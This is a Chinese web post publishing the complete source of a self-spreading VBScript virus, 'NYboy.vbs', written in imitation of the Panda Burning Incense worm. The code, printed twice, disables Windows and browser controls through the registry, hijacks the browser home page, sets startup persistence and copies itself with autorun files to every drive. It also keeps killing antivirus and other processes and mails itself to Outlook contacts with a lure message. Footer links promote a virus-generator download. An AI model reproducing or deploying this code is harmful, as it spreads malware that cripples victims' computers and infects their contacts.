NYboy.vbs病毒源代码公布,我来模拟熊猫烧香
网络编程
使用过U盘的朋友都知道u盘病毒是一种Autorun自运行病毒,当双击时触发病毒体,会复制自身到C D E和系统盘system32下等盘符,(生成exe文件和一个Autorun.inf文件),同时修改注册表,当点击C盘等盘符右键时,会有一个auto命令(黑色粗体)或者是两个开始命令,本人学习vbs才15天,我也来模拟下这个autorun病毒 和部分熊猫烧香功能,本人能力有限, 只能模拟这样的病毒了,声明, 本人模拟这个病毒,全是为了学习和技术,切忌不要搞破坏,如果有人用本人代码破坏,后果自负on error resume next
dim fso,wsh,myfile,ws,pp,fsoFolder
set wsh=wscript.createobject("wscript.shell")
set fso=wscript.createobject("scripting.filesystemobject")
set myfile=fso.GetFile(wscript.scriptfullname)
'修改注册表(开始菜单里面的东西和IE各项设置)
wsh.Regwrite "HKLMSOFTWAREMicrosoftWindowsCurrentVersionExplorerAdvancedFolderHiddenSHOWALLCheckedValue",0,"REG_DWORD"
wsh.Regwrite "HKCUSoftwarePoliciesMicrosoftInternet ExplorerRestrictionsNoBrowserContextMenu",1,"REG_DWORD"
wsh.Regwrite "HKCUSoftwarePoliciesMicrosoftInternet ExplorerRestrictionsNoBrowserOptions",1,"REG_DWORD"
wsh.Regwrite "HKCUSoftwarePoliciesMicrosoftInternet ExplorerRestrictionsNoBrowserSaveAs",1,"REG_DWORD"
wsh.Regwrite "HKCUSoftwarePoliciesMicrosoftInternet ExplorerRestrictionsNoFileOpen",1,"REG_DWORD"
wsh.Regwrite "HKCUSoftwarePoliciesMicrosoftInternet ExplorerControl PanelAdvanced",1,"REG_DWORD"
wsh.Regwrite "HKCUSoftwarePoliciesMicrosoftInternet ExplorerControl PanelCache Internet",1,"REG_DWORD"
wsh.Regwrite "HKCUSoftwarePoliciesMicrosoftInternet ExplorerControl PanelAutoConfig",1,"REG_DWORD"
wsh.Regwrite "HKCUSoftwarePoliciesMicrosoftInternet ExplorerControl PanelHomePage",1,"REG_DWORD"
wsh.Regwrite "HKCUSoftwarePoliciesMicrosoftInternet ExplorerControl PanelHistory",1,"REG_DWORD"
wsh.Regwrite "HKCUSoftwarePoliciesMicrosoftInternet ExplorerControl PanelConnwiz Admin Lock",1,"REG_DWORD"
wsh.Regwrite "HKCUSoftwareMicrosoftInternet ExplorerMainStart Page","http://ruanji03.ys168.com"
wsh.Regwrite "HKCUSoftwareMicrosoftInternet ExplorerMainSearch Page","http://ruanji03.ys168.com"
wsh.Regwrite "HKCUSoftwareMicrosoftInternet ExplorerMainDefault_Page_URL","http://ruanji03.ys168.com"
wsh.Regwrite "HKCUSoftwareMicrosoftInternet ExplorerMainDefault_Search_URL","http://ruanji03.ys168.com"
wsh.Regwrite "HKEY_USERS.DEFAULTSoftwareMicrosoftInternet ExplorerMainStart Page","http://ruanji03.ys168.com"
wsh.Regwrite "HKEY_USERS.DEFAULTSoftwareMicrosoftInternet ExplorerMainDefault_Page_URL","http://ruanji03.ys168.com"
wsh.Regwrite "HKEY_USERS.DEFAULTSoftwareMicrosoftInternet ExplorerMainDefault_Search_URL","http://ruanji03.ys168.com"
wsh.Regwrite "HKEY_USERS.DEFAULTSoftwareMicrosoftInternet ExplorerMainSearch Page","http://ruanji03.ys168.com"
wsh.Regwrite "HKCUSoftwarePoliciesMicrosoftInternet ExplorerControl PanelHomePage",1,"REG_DWORD"
wsh.Regwrite "HKCUSoftwarePoliciesMicrosoftInternet ExplorerControl PanelSecurityTab",1,"REG_DWORD"
wsh.Regwrite "HKCUSoftwarePoliciesMicrosoftInternet ExplorerControl PanelResetWebSettings",1,"REG_DWORD"
wsh.Regwrite "HKCUSoftwarePoliciesMicrosoftInternet ExplorerRestrictionsNoViewSource",1,"REG_DWORD"
wsh.Regwrite "HKCUSoftwarePoliciesMicrosoftInternet ExplorerInfodeliveryRestrictionsNoAddingSubScriptions",1,"REG_DWORD"
wsh.Regwrite "HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerNoFileMenu",1,"REG_DWORD"
wsh.Regwrite "HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesWinOldAppNoRealMode",1,"REG_DWORD"
wsh.Regwrite "HKLMSoftwareMicrosoftWindowsCurrentVersionRunWin32system","c:NYboy.vbs"
wsh.Regwrite "HKLMSoftwareMicrosoftWindowsCurrentVersionRunScanRegistry",""
wsh.Regwrite "HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerNoLogOff",1,"REG_DWORD"
wsh.Regwrite "HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerNoRun",1,"REG_DWORD"
wsh.Regwrite "HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerNoDesktop",1,"REG_DWORD"
wsh.Regwrite "HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerNoViewContextMenu",1,"REG_DWORD"
wsh.Regwrite "HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerNoTrayContextMenu",1,"REG_DWORD"
wsh.Regwrite "HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerNoClose",1,"REG_DWORD"
wsh.Regwrite "HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerStartMenuLogOff",1,"REG_DWORD"
wsh.Regwrite "HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerNoSMHelp",1,"REG_DWORD"
wsh.Regwrite "HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerNoNetHood",1,"REG_DWORD"
wsh.Regwrite "HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerNoWinKeys",1,"REG_DWORD"
wsh.Regwrite "HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerNoSetFolders",1,"REG_DWORD"
wsh.Regwrite "HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerNoRecentDocsMenu",1,"REG_DWORD"
wsh.Regwrite "HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerNoFind","1","REG_DWORD"
wsh.Regwrite "HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerNoWindowsUpdate",1,"REG_DWORD"
wsh.Regwrite "HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerNoSetTaskbar",1,"REG_DWORD"
wsh.Regwrite "HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerNoFavoritesMenu",1,"REG_DWORD"
wsh.Regwrite "HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerNoRecentDocsHistory",1,"REG_DWORD"
wsh.Regwrite "HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesSystemDisableRegistryTools","1","REG_DWORD"
wsh.Regwrite "HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesWinOldAppDisabled",1,"REG_DWORD"
'使用户不能通过双击打开硬盘,这里还可以修改为使其不能通过双击打开文件夹,同理,不赘续
wsh.Regwrite "HKLMSOFTWAREClassesDriveshellautocommand","C:NYboy.bat '%1'"
wsh.Regwrite "HKCRDriveshell","auto"
wsh.Regwrite "HKCRDriveshellautocommand","C:NYboy.bat '%1'"
wsh.Regwrite "HKLMSOFTWAREClassesDirectoryshell","auto"
wsh.Regwrite "HKCRDirectoryshellautocommand","C:NYboy.bat '%1'"
wsh.Regwrite "HKLMSOFTWAREClassesDirectoryshellautocommand","C:NYboy.bat '%1'"
'修改默认文件图标 这里可以换成可爱的熊猫哦
wsh.Regwrite "HKCRexefileDefaultIcon","c:1.ico"
wsh.Regwrite "HKCRtxtfileDefaultIcon","c:1.ico"
wsh.Regwrite "HKCRdllfileDefaultIcon","c:1.ico"
wsh.Regwrite "HKCRbatfileDefaultIcon","c:1.ico"
wsh.Regwrite "HKCRinifileDefaultIcon","c:1.ico"
wsh.Regwrite "HKLMSOFTWAREClassesexefileDefaultIcon","c:1.ico"
wsh.Regwrite "HKLMSOFTWAREClassestxtfileDefaultIcon","c:1.ico"
wsh.Regwrite "HKLMSOFTWAREClassesdllfileDefaultIcon","c:1.ico"
wsh.Regwrite "HKLMSOFTWAREClassesbatfileDefaultIcon","c:1.ico"
wsh.Regwrite "HKLMSOFTWAREClassesinifileDefaultIcon","c:1.ico"
wsh.Regwrite "HKLMSoftwareCLASSES.reg","txtfile"
wsh.Regwrite "HKLMSoftwareMicrosoftWindowsCurrentVersionWinlogonLegalNoticeCaption","你好啊,大兵和你开个小小的玩笑"
wsh.Regwrite "HKLMSoftwareMicrosoftWindowsCurrentVersionWinlogonLegalNoticeText","你已经中毒了,赶快杀毒或者与QQ252287438联系"
'复制自身到C,D,E,F,U盘
myfile.copy "c:"
myfile.copy "D:"
myfile.copy "E:"
myfile.copy "F:"
myfile.copy "I:"
myfile.attributes=34
'定义Autorun.inf 的内容 这个就是u盘病毒必须的代码部分 这里可以简单写
If fso.FileExists("C:autorun.inf") Then
Set objFolder = fso.GetFile("C:autorun.inf")
Else
wsh.run "cmd /c echo [AutoRun]>>C:autorun.inf"_
&"&& echo open=NYboy.bat >>C:autorun.inf"_
&"&& echo shellexecute=NYboy.bat >>C:autorun.inf"_
&"&& echo shellAutocommand=NYboy.bat>>C:autorun.inf"_
&"&& echo shell=Auto>>C:autorun.inf"_
&"&& attrib +h +s +r C:autorun.inf"
set autobatc=fso.createtextfile("c:NYboy.bat",1,ture)
autobatc.writeline("NYboy.vbs")
End If
If fso.FileExists("D:autorun.inf") Then
Set objFolder = fso.GetFile("D:autorun.inf")
Else
wsh.run "cmd /c echo [AutoRun]>>D:autorun.inf"_
&"&& echo open=NYboy.bat >>D:autorun.inf"_
&"&& echo shellexecute=NYboy.bat >>D:autorun.inf"_
&"&& echo shellAutocommand=NYboy.bat>>D:autorun.inf"_
&"&& echo shell=Auto>>D:autorun.inf"_
&"&& attrib +h +s +r D:autorun.inf"
set autobatd=fso.createtextfile("D:NYboy.bat",1,ture)
autobatd.writeline("NYboy.vbs")
End If
If fso.FileExists("E:autorun.inf") Then
Set objFolder = fso.GetFile("E:autorun.inf")
Else
wsh.run "cmd /c echo [AutoRun]>>E:autorun.inf"_
&"&& echo open=NYboy.bat >>E:autorun.inf"_
&"&& echo shellexecute=NYboy.bat >>E:autorun.inf"_
&"&& echo shellAutocommand=NYboy.bat>>E:autorun.inf"_
&"&& echo shell=Auto>>E:autorun.inf"_
&"&& attrib +h +s +r E:autorun.inf"
set autobate=fso.createtextfile("E:NYboy.bat",1,ture)
autobate.writeline("NYboy.vbs")
End If
If fso.FileExists("F:autorun.inf") Then
Set objFolder = fso.GetFile("F:autorun.inf")
Else
wsh.run "cmd /c echo [AutoRun]>>F:autorun.inf"_
&"&& echo open=NYboy.bat >>F:autorun.inf"_
&"&& echo shellexecute=NYboy.bat >>F:autorun.inf"_
&"&& echo shellAutocommand=NYboy.bat>>F:autorun.inf"_
&"&& echo shell=Auto>>F:autorun.inf"_
&"&& attrib +h +s +r F:autorun.inf"
set autobatf=fso.createtextfile("F:NYboy.bat",1,ture)
autobatf.writeline("NYboy.vbs")
End If
If fso.FileExists("I:autorun.inf") Then
Set objFolder = fso.GetFile("I:autorun.inf")
Else
wsh.run "cmd /c echo [AutoRun]>>I:autorun.inf"_
&"&& echo open=NYboy.bat >>I:autorun.inf"_
&"&& echo shellexecute=NYboy.bat >>I:autorun.inf"_
&"&& echo shellAutocommand=NYboy.bat>>I:autorun.inf"_
&"&& echo shell=Auto>>I:autorun.inf"_
&"&& attrib +h +s +r I:autorun.inf"
set autobatf=fso.createtextfile("I:NYboy.bat",1,ture)
autobatf.writeline("NYboy.vbs")
End If
'设置病毒体属性为 系统 只读 隐藏
wsh.run "cmd /c attrib +h +s +r C:NYboy.bat"_
&"&& attrib +h +s +r D:NYboy.bat"_
&"&& attrib +h +s +r E:NYboy.bat"_
&"&& attrib +h +s +r F:NYboy.bat"_
&"&& attrib +h +s +r I:NYboy.bat"
'强制结束某些进程,比如QQ,记事本,网页,批处理文件,卡巴,realplay等进程,运行后打不开这些文件
do
set ws=getobject("winmgmts:\.rootcimv2")
set pp=ws.execquery("select * from win32_process where name='taskmgr.exe'or Name = 'QQ.exe'or Name = 'notepad.exe'or Name = 'IEXPLORE.exe'or Name = 'cmd.exe'or Name = 'avp.exe'or Name = 'winRAR.exe'or Name = 'realplay.exe'or Name = 'WINWORD.exe'")
for each i in pp
i.terminate()
wscript.sleep 100
next
loop
'使病毒可以靠邮件传播
Set ol=CreateObject("Outlook.Application")
On Error Resume Next
For x=1 To 5
Set Mail=ol.CreateItem(0)
Mail.to=ol.GetNameSpace("MAPI").AddressLists(1).AddressEntries(x)
Mail.Subject="今晚你来吗?"
Mail.Body="朋友你好:您的朋友给您发来了热情的邀请。具体情况请阅读随信附件,祝您好运! QQ交友频道"
Mail.Attachments.Add("c:NYboy.vbs")
Mail.Send
Next
ol.Quit
dim fso,wsh,myfile,ws,pp,fsoFolder
set wsh=wscript.createobject("wscript.shell")
set fso=wscript.createobject("scripting.filesystemobject")
set myfile=fso.GetFile(wscript.scriptfullname)
'修改注册表(开始菜单里面的东西和IE各项设置)
wsh.Regwrite "HKLMSOFTWAREMicrosoftWindowsCurrentVersionExplorerAdvancedFolderHiddenSHOWALLCheckedValue",0,"REG_DWORD"
wsh.Regwrite "HKCUSoftwarePoliciesMicrosoftInternet ExplorerRestrictionsNoBrowserContextMenu",1,"REG_DWORD"
wsh.Regwrite "HKCUSoftwarePoliciesMicrosoftInternet ExplorerRestrictionsNoBrowserOptions",1,"REG_DWORD"
wsh.Regwrite "HKCUSoftwarePoliciesMicrosoftInternet ExplorerRestrictionsNoBrowserSaveAs",1,"REG_DWORD"
wsh.Regwrite "HKCUSoftwarePoliciesMicrosoftInternet ExplorerRestrictionsNoFileOpen",1,"REG_DWORD"
wsh.Regwrite "HKCUSoftwarePoliciesMicrosoftInternet ExplorerControl PanelAdvanced",1,"REG_DWORD"
wsh.Regwrite "HKCUSoftwarePoliciesMicrosoftInternet ExplorerControl PanelCache Internet",1,"REG_DWORD"
wsh.Regwrite "HKCUSoftwarePoliciesMicrosoftInternet ExplorerControl PanelAutoConfig",1,"REG_DWORD"
wsh.Regwrite "HKCUSoftwarePoliciesMicrosoftInternet ExplorerControl PanelHomePage",1,"REG_DWORD"
wsh.Regwrite "HKCUSoftwarePoliciesMicrosoftInternet ExplorerControl PanelHistory",1,"REG_DWORD"
wsh.Regwrite "HKCUSoftwarePoliciesMicrosoftInternet ExplorerControl PanelConnwiz Admin Lock",1,"REG_DWORD"
wsh.Regwrite "HKCUSoftwareMicrosoftInternet ExplorerMainStart Page","http://ruanji03.ys168.com"
wsh.Regwrite "HKCUSoftwareMicrosoftInternet ExplorerMainSearch Page","http://ruanji03.ys168.com"
wsh.Regwrite "HKCUSoftwareMicrosoftInternet ExplorerMainDefault_Page_URL","http://ruanji03.ys168.com"
wsh.Regwrite "HKCUSoftwareMicrosoftInternet ExplorerMainDefault_Search_URL","http://ruanji03.ys168.com"
wsh.Regwrite "HKEY_USERS.DEFAULTSoftwareMicrosoftInternet ExplorerMainStart Page","http://ruanji03.ys168.com"
wsh.Regwrite "HKEY_USERS.DEFAULTSoftwareMicrosoftInternet ExplorerMainDefault_Page_URL","http://ruanji03.ys168.com"
wsh.Regwrite "HKEY_USERS.DEFAULTSoftwareMicrosoftInternet ExplorerMainDefault_Search_URL","http://ruanji03.ys168.com"
wsh.Regwrite "HKEY_USERS.DEFAULTSoftwareMicrosoftInternet ExplorerMainSearch Page","http://ruanji03.ys168.com"
wsh.Regwrite "HKCUSoftwarePoliciesMicrosoftInternet ExplorerControl PanelHomePage",1,"REG_DWORD"
wsh.Regwrite "HKCUSoftwarePoliciesMicrosoftInternet ExplorerControl PanelSecurityTab",1,"REG_DWORD"
wsh.Regwrite "HKCUSoftwarePoliciesMicrosoftInternet ExplorerControl PanelResetWebSettings",1,"REG_DWORD"
wsh.Regwrite "HKCUSoftwarePoliciesMicrosoftInternet ExplorerRestrictionsNoViewSource",1,"REG_DWORD"
wsh.Regwrite "HKCUSoftwarePoliciesMicrosoftInternet ExplorerInfodeliveryRestrictionsNoAddingSubScriptions",1,"REG_DWORD"
wsh.Regwrite "HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerNoFileMenu",1,"REG_DWORD"
wsh.Regwrite "HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesWinOldAppNoRealMode",1,"REG_DWORD"
wsh.Regwrite "HKLMSoftwareMicrosoftWindowsCurrentVersionRunWin32system","c:NYboy.vbs"
wsh.Regwrite "HKLMSoftwareMicrosoftWindowsCurrentVersionRunScanRegistry",""
wsh.Regwrite "HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerNoLogOff",1,"REG_DWORD"
wsh.Regwrite "HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerNoRun",1,"REG_DWORD"
wsh.Regwrite "HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerNoDesktop",1,"REG_DWORD"
wsh.Regwrite "HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerNoViewContextMenu",1,"REG_DWORD"
wsh.Regwrite "HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerNoTrayContextMenu",1,"REG_DWORD"
wsh.Regwrite "HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerNoClose",1,"REG_DWORD"
wsh.Regwrite "HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerStartMenuLogOff",1,"REG_DWORD"
wsh.Regwrite "HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerNoSMHelp",1,"REG_DWORD"
wsh.Regwrite "HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerNoNetHood",1,"REG_DWORD"
wsh.Regwrite "HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerNoWinKeys",1,"REG_DWORD"
wsh.Regwrite "HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerNoSetFolders",1,"REG_DWORD"
wsh.Regwrite "HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerNoRecentDocsMenu",1,"REG_DWORD"
wsh.Regwrite "HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerNoFind","1","REG_DWORD"
wsh.Regwrite "HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerNoWindowsUpdate",1,"REG_DWORD"
wsh.Regwrite "HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerNoSetTaskbar",1,"REG_DWORD"
wsh.Regwrite "HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerNoFavoritesMenu",1,"REG_DWORD"
wsh.Regwrite "HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerNoRecentDocsHistory",1,"REG_DWORD"
wsh.Regwrite "HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesSystemDisableRegistryTools","1","REG_DWORD"
wsh.Regwrite "HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesWinOldAppDisabled",1,"REG_DWORD"
'使用户不能通过双击打开硬盘,这里还可以修改为使其不能通过双击打开文件夹,同理,不赘续
wsh.Regwrite "HKLMSOFTWAREClassesDriveshellautocommand","C:NYboy.bat '%1'"
wsh.Regwrite "HKCRDriveshell","auto"
wsh.Regwrite "HKCRDriveshellautocommand","C:NYboy.bat '%1'"
wsh.Regwrite "HKLMSOFTWAREClassesDirectoryshell","auto"
wsh.Regwrite "HKCRDirectoryshellautocommand","C:NYboy.bat '%1'"
wsh.Regwrite "HKLMSOFTWAREClassesDirectoryshellautocommand","C:NYboy.bat '%1'"
'修改默认文件图标 这里可以换成可爱的熊猫哦
wsh.Regwrite "HKCRexefileDefaultIcon","c:1.ico"
wsh.Regwrite "HKCRtxtfileDefaultIcon","c:1.ico"
wsh.Regwrite "HKCRdllfileDefaultIcon","c:1.ico"
wsh.Regwrite "HKCRbatfileDefaultIcon","c:1.ico"
wsh.Regwrite "HKCRinifileDefaultIcon","c:1.ico"
wsh.Regwrite "HKLMSOFTWAREClassesexefileDefaultIcon","c:1.ico"
wsh.Regwrite "HKLMSOFTWAREClassestxtfileDefaultIcon","c:1.ico"
wsh.Regwrite "HKLMSOFTWAREClassesdllfileDefaultIcon","c:1.ico"
wsh.Regwrite "HKLMSOFTWAREClassesbatfileDefaultIcon","c:1.ico"
wsh.Regwrite "HKLMSOFTWAREClassesinifileDefaultIcon","c:1.ico"
wsh.Regwrite "HKLMSoftwareCLASSES.reg","txtfile"
wsh.Regwrite "HKLMSoftwareMicrosoftWindowsCurrentVersionWinlogonLegalNoticeCaption","你好啊,大兵和你开个小小的玩笑"
wsh.Regwrite "HKLMSoftwareMicrosoftWindowsCurrentVersionWinlogonLegalNoticeText","你已经中毒了,赶快杀毒或者与QQ252287438联系"
'复制自身到C,D,E,F,U盘
myfile.copy "c:"
myfile.copy "D:"
myfile.copy "E:"
myfile.copy "F:"
myfile.copy "I:"
myfile.attributes=34
'定义Autorun.inf 的内容 这个就是u盘病毒必须的代码部分 这里可以简单写
If fso.FileExists("C:autorun.inf") Then
Set objFolder = fso.GetFile("C:autorun.inf")
Else
wsh.run "cmd /c echo [AutoRun]>>C:autorun.inf"_
&"&& echo open=NYboy.bat >>C:autorun.inf"_
&"&& echo shellexecute=NYboy.bat >>C:autorun.inf"_
&"&& echo shellAutocommand=NYboy.bat>>C:autorun.inf"_
&"&& echo shell=Auto>>C:autorun.inf"_
&"&& attrib +h +s +r C:autorun.inf"
set autobatc=fso.createtextfile("c:NYboy.bat",1,ture)
autobatc.writeline("NYboy.vbs")
End If
If fso.FileExists("D:autorun.inf") Then
Set objFolder = fso.GetFile("D:autorun.inf")
Else
wsh.run "cmd /c echo [AutoRun]>>D:autorun.inf"_
&"&& echo open=NYboy.bat >>D:autorun.inf"_
&"&& echo shellexecute=NYboy.bat >>D:autorun.inf"_
&"&& echo shellAutocommand=NYboy.bat>>D:autorun.inf"_
&"&& echo shell=Auto>>D:autorun.inf"_
&"&& attrib +h +s +r D:autorun.inf"
set autobatd=fso.createtextfile("D:NYboy.bat",1,ture)
autobatd.writeline("NYboy.vbs")
End If
If fso.FileExists("E:autorun.inf") Then
Set objFolder = fso.GetFile("E:autorun.inf")
Else
wsh.run "cmd /c echo [AutoRun]>>E:autorun.inf"_
&"&& echo open=NYboy.bat >>E:autorun.inf"_
&"&& echo shellexecute=NYboy.bat >>E:autorun.inf"_
&"&& echo shellAutocommand=NYboy.bat>>E:autorun.inf"_
&"&& echo shell=Auto>>E:autorun.inf"_
&"&& attrib +h +s +r E:autorun.inf"
set autobate=fso.createtextfile("E:NYboy.bat",1,ture)
autobate.writeline("NYboy.vbs")
End If
If fso.FileExists("F:autorun.inf") Then
Set objFolder = fso.GetFile("F:autorun.inf")
Else
wsh.run "cmd /c echo [AutoRun]>>F:autorun.inf"_
&"&& echo open=NYboy.bat >>F:autorun.inf"_
&"&& echo shellexecute=NYboy.bat >>F:autorun.inf"_
&"&& echo shellAutocommand=NYboy.bat>>F:autorun.inf"_
&"&& echo shell=Auto>>F:autorun.inf"_
&"&& attrib +h +s +r F:autorun.inf"
set autobatf=fso.createtextfile("F:NYboy.bat",1,ture)
autobatf.writeline("NYboy.vbs")
End If
If fso.FileExists("I:autorun.inf") Then
Set objFolder = fso.GetFile("I:autorun.inf")
Else
wsh.run "cmd /c echo [AutoRun]>>I:autorun.inf"_
&"&& echo open=NYboy.bat >>I:autorun.inf"_
&"&& echo shellexecute=NYboy.bat >>I:autorun.inf"_
&"&& echo shellAutocommand=NYboy.bat>>I:autorun.inf"_
&"&& echo shell=Auto>>I:autorun.inf"_
&"&& attrib +h +s +r I:autorun.inf"
set autobatf=fso.createtextfile("I:NYboy.bat",1,ture)
autobatf.writeline("NYboy.vbs")
End If
'设置病毒体属性为 系统 只读 隐藏
wsh.run "cmd /c attrib +h +s +r C:NYboy.bat"_
&"&& attrib +h +s +r D:NYboy.bat"_
&"&& attrib +h +s +r E:NYboy.bat"_
&"&& attrib +h +s +r F:NYboy.bat"_
&"&& attrib +h +s +r I:NYboy.bat"
'强制结束某些进程,比如QQ,记事本,网页,批处理文件,卡巴,realplay等进程,运行后打不开这些文件
do
set ws=getobject("winmgmts:\.rootcimv2")
set pp=ws.execquery("select * from win32_process where name='taskmgr.exe'or Name = 'QQ.exe'or Name = 'notepad.exe'or Name = 'IEXPLORE.exe'or Name = 'cmd.exe'or Name = 'avp.exe'or Name = 'winRAR.exe'or Name = 'realplay.exe'or Name = 'WINWORD.exe'")
for each i in pp
i.terminate()
wscript.sleep 100
next
loop
'使病毒可以靠邮件传播
Set ol=CreateObject("Outlook.Application")
On Error Resume Next
For x=1 To 5
Set Mail=ol.CreateItem(0)
Mail.to=ol.GetNameSpace("MAPI").AddressLists(1).AddressEntries(x)
Mail.Subject="今晚你来吗?"
Mail.Body="朋友你好:您的朋友给您发来了热情的邀请。具体情况请阅读随信附件,祝您好运! QQ交友频道"
Mail.Attachments.Add("c:NYboy.vbs")
Mail.Send
Next
ol.Quit
vbs脚本病毒生成器 下载
Vbs脚本病毒生成器V1.0版简介:国产的新编的vbs脚本病毒生成器1.0版,本程序通过采集用户的各项输入、选择,产生符合需要的vbs脚本病毒,属于傻瓜式
用vbs实现返回 IP 配置数据
描述信息用以返回配置数据(类似于IPCONFIG命令返回信息)的WMI脚本。脚本代码'ReturningIPConfigurationData'WMIscriptthatreturnsconfigurationdatasimilartothatreturnedbyIpConf
mdir.vbs 建立隐藏虚拟目录的vbs
建立隐藏虚拟目录使用。首先要先在对应WEB目录里建立一个目录。然后利用脚本直接在Shell中创建虚拟目录。仅仅为了方便大家使用。方法如下C:mdir.vbs*
编辑:一起学习网
标签:病毒,脚本,生成器,双击,文件